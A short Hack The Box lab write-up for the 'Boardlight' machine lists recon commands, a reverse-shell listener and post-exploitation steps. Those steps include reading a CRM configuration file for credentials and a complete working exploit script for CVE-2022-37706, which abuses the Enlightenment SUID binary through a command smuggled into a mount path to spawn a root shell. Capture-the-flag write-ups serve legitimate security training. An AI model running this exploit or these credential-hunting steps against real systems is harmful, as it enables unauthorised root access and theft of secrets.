PyUs3r

PyUs3r

Pentester, CTF player

Boardlight - Hack The Box

Reconnaissance

  • Nmap
nmap -sS --open -p- --min-rate 5000 -vvv -Pn 10.10.11.11
  • Add domain to local DNS
echo "10.10.11.11 board.htb" >> /etc/hosts
  • Subdomain fuzzing with Gobuster
gobuster vhost -u http://board.htb/ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -t 20 --append-domain

  • Add subdomain to local DNS
echo "10.10.11.11 crm.board.htb" >> /etc/hosts

Exploitation

  • Login with admin default password

  • Test PHP bypass

  • Send reverse shell

nc -nlvp 9000

Post-exploitation

  • Find conf files
find / -name \*conf\* 2>/dev/null | grep -vE "proc|sys|usr|etc|boot|lib|dpkg"


cat /var/www/html/crm.board.htb/htdocs/conf/conf.php

  • Pivoting
su larissa
  • Find SUID
find / -perm -4000 2>/dev/null

  • Execute exploit
#!/bin/bash
echo "CVE-2022-37706"
echo "[*] Trying to find the vulnerable SUID file..."
echo "[*] This may take few seconds..."

file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)
if [[ -z ${file} ]]
then
	echo "[-] Couldn't find the vulnerable SUID file..."
	echo "[*] Enlightenment should be installed on your system."
	exit 1
fi

echo "[+] Vulnerable SUID binary found!"
echo "[+] Trying to pop a root shell!"
mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"

echo "/bin/sh" > /tmp/exploit
chmod a+x /tmp/exploit
echo "[+] Enjoy the root shell :)"
${file} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net

chmod +x exploit.sh
./exploit.sh